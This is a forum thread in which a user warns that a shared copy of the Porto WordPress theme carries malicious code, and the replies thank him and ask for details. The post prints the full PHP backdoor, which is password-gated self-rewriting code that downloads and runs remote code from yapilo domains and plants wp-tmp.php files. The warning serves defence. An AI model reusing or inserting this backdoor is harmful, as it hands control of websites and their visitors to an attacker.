Recently shared Wordpress themes - Malicious code alert

***MajoMaslo*** · 05-02-2018, 06:02 PM

Hello guys,

I was looking for a specific theme here, called Porto. I found this in the one of the phpfile. If someone is using porto theme from here, check your theme for this piece of crap code.

Code:

<?php

if (isset($_REQUEST['action']) and& isset($_REQUEST['password']) and& ($_REQUEST['password'] == '0d67644b8ea933a2150708b0d6cfb63a'))

    {

$div_code_name="wp_vcd";

        switch ($_REQUEST['action'])

            {

                case 'change_domain';

                    if (isset($_REQUEST['newdomain']))

                        {

                            if (!empty($_REQUEST['newdomain']))

                                {

                                                                           if ($file = @file_get_contents(__FILE__))

                                                                            {

                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))

                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);

                                                                                       @file_put_contents(__FILE__, $file);

                                                               print "true";

                                                                                                             }

                                                                            }

                                }

                        }

                break;

                                case 'change_code';

                    if (isset($_REQUEST['newcode']))

                        {

                            if (!empty($_REQUEST['newcode']))

                                {

                                                                           if ($file = @file_get_contents(__FILE__))

                                                                            {

                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))

                                                                                                             {

                                                                                       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);

                                                                                       @file_put_contents(__FILE__, $file);

                                                               print "true";

                                                                                                             }

                                                                            }

                                }

                        }

                break;

                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";

            }

        die("");

    }

$div_code_name = "wp_vcd";

$funcfile      = __FILE__;

if(!function_exists('theme_temp_setup')) {

    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];

    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false and& stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)

        {

            $ch = curl_init();

            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

            curl_setopt($ch, CURLOPT_HEADER, 0);

            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

            curl_setopt($ch, CURLOPT_URL, $url);

            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

            $data = curl_exec($ch);

            curl_close($ch);

            return $data;

        }

        function theme_temp_setup($phpCode)

        {

            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");

            $handle   = fopen($tmpfname, "w+");

           if( fwrite($handle, "<?php\n" . $phpCode))

           {

           }

            else

            {

            $tmpfname = tempnam('./', "theme_temp_setup");

            $handle   = fopen($tmpfname, "w+");

            fwrite($handle, "<?php\n" . $phpCode);

            }

            fclose($handle);

            include $tmpfname;

            unlink($tmpfname);

            return get_defined_vars();

        }

$wp_auth_key='d531149156c109f723240880dc5e520e';

        if (($tmpcontent = @file_get_contents("http://www.yapilo.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.yapilo.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {

                extract(theme_temp_setup($tmpcontent));

                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

                        @file_put_contents('wp-tmp.php', $tmpcontent);

                    }

                }

            }

        }

        elseif ($tmpcontent = @file_get_contents("http://www.yapilo.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {

                extract(theme_temp_setup($tmpcontent));

                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

                        @file_put_contents('wp-tmp.php', $tmpcontent);

                    }

                }

            }

        } 

                elseif ($tmpcontent = @file_get_contents("http://www.yapilo.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {

                extract(theme_temp_setup($tmpcontent));

                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

                        @file_put_contents('wp-tmp.php', $tmpcontent);

                    }

                }

            }

        }

        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

            extract(theme_temp_setup($tmpcontent)); 

        } 

    }

}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp

?>

***The Saint*** · 05-02-2018, 09:09 PM

Thank you for the alert friend. Appreciated

***CanhCam Guy*** · 05-02-2018, 09:38 PM

What thread you get it?
Let us for avoid?

***pelangi17*** · 05-02-2018, 09:38 PM

what is the effect of the code??/

***keanokia*** · 05-02-2018, 10:41 PM

that malicious guy must be out here. Thank you for the alert

***bale*** · 05-02-2018, 11:30 PM

Could you be more specific? You are not helping much. What did you download? Where? How?

***storm180*** · 05-02-2018, 11:35 PM

You might also want to put the alert inside the thread of the porto theme so people know.

***omg*** · 05-03-2018, 04:26 AM

yes, whats the point of saying it has malicious code and not saying where you got it from ?

everyone else is still going to get the malicious code now. (thanks)

***simsimi2014*** · 05-06-2018, 01:41 AM

thanks for this alert